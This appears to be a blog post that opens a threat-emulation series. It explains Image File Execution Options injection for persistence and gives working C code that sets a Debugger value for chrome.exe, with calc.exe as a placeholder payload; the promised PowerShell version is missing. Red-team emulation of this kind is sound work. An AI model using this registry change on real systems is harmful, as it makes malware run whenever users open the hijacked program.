skip to content W3C SVG

Threat Emulation Series - Introduction - Event Triggered Execution

Description: This post is an introductory post to a series of blog posts that I’ll be diving into which will detail emulating threat actors and their associated TTPs with code.

In this particular blog post, we’ll be diving into the topic of persistence which can be accomplished by manipulating Windows registry key values! Specifically, we’ll be examining the Event Trigger Execution Technique in which an attacker modify system mechanisms to gain execution based upon specific events.

A great example of this is Image File Execution Options Injection in which malicious content, such as malware, can be executed upon a specific event happening, such as an application opening, by modifying the debugger value within the registry for a specific application.

So a general overview would be: We add a debugger value to a specific application and point it to our malware, such as a browser, and each time a user launches the browser, our malware would execute.

Let’s say we were targeting the Chrome application which has a registry key located at HKLM:/Software/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/chrome.exe.

So we’d want to add a Debugger subkey & set its value to be the full path to our malicious executable (in this case, it’s a classic calc.exe example).

We can do this via Powershell:

Or we can do it via compiled C code using the Windows API (my personal favorite):

// Event Triggered Execution: Image File Execution Options Injection (T1546.012), Sub-Technique of Event Triggered Execution

#include <windows.h>
#include <stdio.h>

char szEvilExecutable[] = {"C:\\Windows\\System32\\calc.exe"};
char szSubKeyName[] = {"Debugger"};
char szTargetKey[] = {"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\chrome.exe"};


int main() {
    HKEY hKey;
    LSTATUS openResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szTargetKey, 0, KEY_ALL_ACCESS, &hKey);
    if (openResult == ERROR_SUCCESS) {
        printf("Opened registry key\n");
    }
    LSTATUS setResult = RegSetValueEx(hKey, szSubKeyName, 0, REG_SZ, szEvilExecutable, sizeof(szEvilExecutable));
    if (setResult == ERROR_SUCCESS) {
        printf("Set the registry key value!\n");
    } else {
        printf("Error setting registry key value\n");
    }
    RegCloseKey(hKey);
    return 0;
}

And this is how it’d look running: